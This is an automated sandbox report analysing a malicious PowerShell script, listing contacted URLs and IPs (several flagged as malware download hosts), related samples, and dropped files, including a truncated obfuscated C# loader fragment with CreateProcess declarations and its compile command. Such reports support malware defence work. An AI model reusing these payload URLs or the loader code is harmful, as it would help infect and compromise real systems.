                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000001.00000002.2351696748.0000025001BBD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://status.squarespace.compowershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000001.00000002.2351696748.000002500181C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://bemnyc.compowershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://eastend.jppowershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://fenett2018.compowershell.exe, 00000001.00000002.2351696748.00000250003ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://habarimoto24.compowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://fenett2018.com/dobgxpowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://habarimoto24.com/nhpowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://abakus-biuro.net//a9zqemmpowershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1false
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://abakus-biuro.netpowershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              198.185.159.145
                                              		bemnyc.comUnited States
                                              		53831SQUARESPACEUSfalse
                                              162.43.104.133
                                              		eastend.jpUnited States
                                              		11333CYBERTRAILSUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1560751
                                              Start date and time:2024-11-22 09:26:46 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 4s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:ps1001.ps1
                                              Detection:MAL
                                              Classification:mal96.expl.evad.winPS1@7/14@6/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 5
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Found application associated with file extension: .ps1

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • VT rate limit hit for: ps1001.ps1

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:27:48API Interceptor9009x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              198.185.159.145ps1008.ps1Get hashmaliciousUnknownBrowse
                                              • bemnyc.com/u8erijeq
                                              ps1006.ps1Get hashmaliciousUnknownBrowse
                                              • bemnyc.com/u8erijeq
                                              ps1005.ps1Get hashmaliciousUnknownBrowse
                                              • bemnyc.com/u8erijeq
                                              Purchase Order #5315262WNH72901-The Sanford Company.pdfGet hashmaliciousUnknownBrowse
                                              • aircormech.com/
                                              firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                              • 198.185.159.145/
                                              firmware.i586.elfGet hashmaliciousUnknownBrowse
                                              • 198.185.159.145/
                                              eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                              • uwemusic.com/
                                              FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                              • familycompany.net/index.php
                                              FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
                                              • familycompany.net/index.php
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                              • www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
                                              162.43.104.133ps1008.ps1Get hashmaliciousUnknownBrowse
                                              • eastend.jp/bl5kfa
                                              ps1006.ps1Get hashmaliciousUnknownBrowse
                                              • eastend.jp/bl5kfa
                                              ps1005.ps1Get hashmaliciousUnknownBrowse
                                              • eastend.jp/bl5kfa

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              eastend.jpps1008.ps1Get hashmaliciousUnknownBrowse
                                              • 162.43.104.133
                                              ps1006.ps1Get hashmaliciousUnknownBrowse
                                              • 162.43.104.133
                                              ps1005.ps1Get hashmaliciousUnknownBrowse
                                              • 162.43.104.133
                                              bemnyc.comps1008.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              ps1006.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              ps1005.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              pdf.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CYBERTRAILSUSps1008.ps1Get hashmaliciousUnknownBrowse
                                              • 162.43.104.133
                                              ps1006.ps1Get hashmaliciousUnknownBrowse
                                              • 162.43.104.133
                                              ps1005.ps1Get hashmaliciousUnknownBrowse
                                              • 162.43.104.133
                                              IWnUKXop2x.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 162.43.182.68
                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                              • 162.43.62.102
                                              25XrVZw56S.exeGet hashmaliciousUnknownBrowse
                                              • 162.43.112.11
                                              oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                              • 162.43.112.11
                                              JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                              • 162.43.112.11
                                              oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                              • 162.43.112.11
                                              JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                              • 162.43.112.11
                                              SQUARESPACEUSps1008.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              ps1006.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              ps1005.ps1Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              https://link.edgepilot.com/s/62feea16/mgkISLmjmE63UVzPYgooJQ?u=https://ameely.com.eg/Get hashmaliciousUnknownBrowse
                                              • 198.185.159.145
                                              https://sawfish-groundhog-d6h6.squarespace.com/Get hashmaliciousUnknownBrowse
                                              • 198.185.159.177
                                              original.emlGet hashmaliciousUnknownBrowse
                                              • 198.185.159.144
                                              https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                              • 198.185.159.177
                                              https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                              • 198.185.159.177
                                              http://heptagon-olive-l8hr.squarespace.comGet hashmaliciousUnknownBrowse
                                              • 198.185.159.177
                                              botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 142.202.19.72

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):61147
                                              Entropy (8bit):5.0779483220981145
                                              Encrypted:false
                                              SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHaqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPI
                                              MD5:A76FC79CC71F2C9A6023862053AC8DAA
                                              SHA1:F44A5893A9D2288B73C827F1853940EBEACDB9DF
                                              SHA-256:F798F95B18AE3C02C1741996B103531626B0F9E980DD2177DB80B8C45B539DC7
                                              SHA-512:F4EA42545E59C742F0AD00D3D4DF4726527365E20B7A5BEA212B2B1722D6E13ED9DF34326A3326352F44711F28C57FCFAF7443BB6B375725B33A641E717AA871
                                              Malicious:false
                                              Reputation:low
                                              Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:NlllulxmH/lZ:NllUg
                                              MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                              SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                              SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                              SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e................................. ..............@..........

                                              C:\Users\user\AppData\Local\Temp\RES4568.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 22 10:23:37 2024, 1st section name ".debug$S"
                                              Category:dropped
                                              Size (bytes):1332
                                              Entropy (8bit):4.009916244691291
                                              Encrypted:false
                                              SSDEEP:24:H+sFzW91rBdTIH8wKRmNII+ycuZhNvakSxPNnqS2d:yBdTIjKRmu1ulva3DqSG
                                              MD5:77C06A4494756855CB53F94CC3C14687
                                              SHA1:4773E573A538C3F6BC6BC718B50F4AC7D73352F9
                                              SHA-256:06F1D5EACED518619698BC1505C56E0C76665C926152A9877185C12146B1E27D
                                              SHA-512:E7644F7D12631793AFD41A5E581D70B50586FF7F2A1DD4FCDC94EC89A9A86BBF3F0A950F6215493983BE7EBD4BDED6CFD9B3F1D9B914E1ADAA5D839ECD861BED
                                              Malicious:false
                                              Reputation:low
                                              Preview:L....[@g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP...............b.BG..4N1......2..........5.......C:\Users\user\AppData\Local\Temp\RES4568.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.a.k.e.f.3.h.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcaabhtm.0mv.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijtdrrcz.c4i.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lijprhbp.wc4.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygd4tfjk.q3y.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.1029857567356935
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAGak7YnqqxXPN5Dlq5J:+RI+ycuZhNvakSxPNnqX
                                              MD5:629D4247C0A5344E31838587A88EED32
                                              SHA1:1E07FC3F0886A1A0CEFCC62406F6C7C6C942E18C
                                              SHA-256:0B48B3C362D896A541E84340B99F6DE1C91D1341F4CD7DD8B4D4B0F2EB4D408F
                                              SHA-512:1285F00C7E3055DDA7DA5D6653A5B3F2836C52DBA08C783503FA0F823A4233AF3F0DB3AAE4B8340E4E3DD816B993C98838D93808445F26F436EABFDC04CAB0FC
                                              Malicious:false
                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.a.k.e.f.3.h.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.a.k.e.f.3.h.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                              C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.0.cs

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1032), with no line terminators
                                              Category:dropped
                                              Size (bytes):1035
                                              Entropy (8bit):4.369231230362479
                                              Encrypted:false
                                              SSDEEP:24:JVPHMxi73UnaDa+anvOq89NWEMF90A7Q/:JVPHMxi73fa++1UNWEpf
                                              MD5:5989018A4C0AD9CC8BC4CC1E5524186C
                                              SHA1:EC9217244192C5EC96B4AC67982AC05983036569
                                              SHA-256:F2C563322C4D6A4C8B00946B48E3A59B45D8EC5991D977ACD4514960F8FAB4E5
                                              SHA-512:2550FB415B2022E3E3D14BE551310C7C6821D8B1AF7854253D8701F5376D720E1F661C0177F24B0F3BFEDF90469064C107D72B1DCAC6EFA355C24DC6AA786975
                                              Malicious:false
                                              Preview:.using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct l1Ill1{public IntPtr llI1Il1111;public IntPtr ll11llII111;public uint II11IIIIIIl;public uint Il1lI1;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct l1lll1l{public uint II1l1Il1II;public string I11l1111I;public string lllIIlII;public string l1I1IIllI1I1;public uint I1I1ll11I;public uint lIlII11;public uint II11lIIl11I;public uint lIl1lIl1II11;public uint lIIl1Il;public uint Illl11I1;public uint II1ll1l11;public uint IlIlIl1Illl;public short l11111lI1l;public short lllIllI11I11;public IntPtr I1II1lIII;public IntPtr Il11lI1;public IntPtr ll1IlI;public IntPtr l1l11Il1lll1;};public static class lIlIlI{[DllImport("kernel32.dll",SetLastError=true)]public static extern bool CreateProcess(string llllIIIllIlI,string l1111I1I11I1,IntPtr ll1Il111,IntPtr IIIll11Il1,bool l1Il1lll111,uint IIlIl11l11l,IntPtr Il1I1Il11l1l,string l1l1Illl,ref l1lll

                                              C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                              Category:dropped
                                              Size (bytes):371
                                              Entropy (8bit):5.245978274073425
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fJbTekGzxs7+AEszICHhJ23fJbTekb:p37Lvkmb6KiBNGWZEvBNbn
                                              MD5:E549796D1345E2C16EBC01BC6C79C3DA
                                              SHA1:6EDBB0641D21AC79CCE6D1AB5D906E50767074DF
                                              SHA-256:76552C23D188D9D1B0C5524C5E2235FB52C8D3D5B26E6C3DB6F6F8E966A7ABBF
                                              SHA-512:619C336D8CDA348288A6C8942A1D1CAF8917A53A739A1CF2CACC32D449084297E9DCC53D808CD55979E9DCD1458528C0C89310143AE9D5CF4F940CE6C33FE2B5
                                              Malicious:true
                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.0.cs"

                                              C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4096
                                              Entropy (8bit):2.9934897920946817
                                              Encrypted:false
                                              SSDEEP:48:6p+xOMHQ+7mlodY+w4IGjKsxg5D5P2oU7WhjJK2eW1ulva3Dq:5fQ+7mlyY+w47KCKooIcNg9K
                                              MD5:DEB68662AD35899D1E2C1EEFA84CFE0E
                                              SHA1:F5B238E8C64BB4111BAA093085616B391D6EAA4F
                                              SHA-256:B56E56720FEEFE8EE07F5FD86F7281961891B99A4F905451223F3D858E517062
                                              SHA-512:B5222ABADF02CF495CBA3FD4358C1DE935AA9B853828CFE9FDDA1ABA0E0D29DAE946839B949EC9612D1C1E556359FA4BA3B71B53D52CDA4D8F6F376090622814
                                              Malicious:false
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[@g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..\...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......d...#Blob...........W.........%3................................................................=.6...G.6...............".....I....._.....j.................................................&...........N.....Y.....e.....q.....x.......................................................................................

                                              C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.out

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):872
                                              Entropy (8bit):5.310544965075116
                                              Encrypted:false
                                              SSDEEP:24:KOId3ka6KiBNXEvBNbuKax5DqBVKVrdFAMBJTH:xkka6LBhEvBduK2DcVKdBJj
                                              MD5:6736BB705E2E3824696481640224212A
                                              SHA1:4470BEC2887B29144E3B9CC52A00F098F46E9F07
                                              SHA-256:EA27264ED6660C71B856DECA832772401E9D568127FE8769BA2009071DCBC9CD
                                              SHA-512:CB8B6266D2991600870BE8D65D7BA3D4694A1DA0ECC66752EEAC3D5099152DE3DACCE645D90C0BB892C003D71A4E5F4036125CDE2BE41778121852F2502AB37B
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6222
                                              Entropy (8bit):3.7124798944453925
                                              Encrypted:false
                                              SSDEEP:96:pRKqCKP8tkvhkvCCt53gOYoahHDegOYoaiHDU:pRKEPS53gOzmegOz7U
                                              MD5:EEB519AF466377D546D03374F4E4AB42
                                              SHA1:E547CFF5186D96B41767C71DB582389A6986F567
                                              SHA-256:1F28D323BD98E7F324C706D25D793EB400825FAC96BC172618C514919FC2B51F
                                              SHA-512:2D22E0A22B965F71F9A8FBD1CA1AAB70E382150573B18A6AF9A3B58A4E66B124FA1C820928EE53465D04D5D445B0E488F7E4045569D05C67A76AB4173CE9A232
                                              Malicious:false
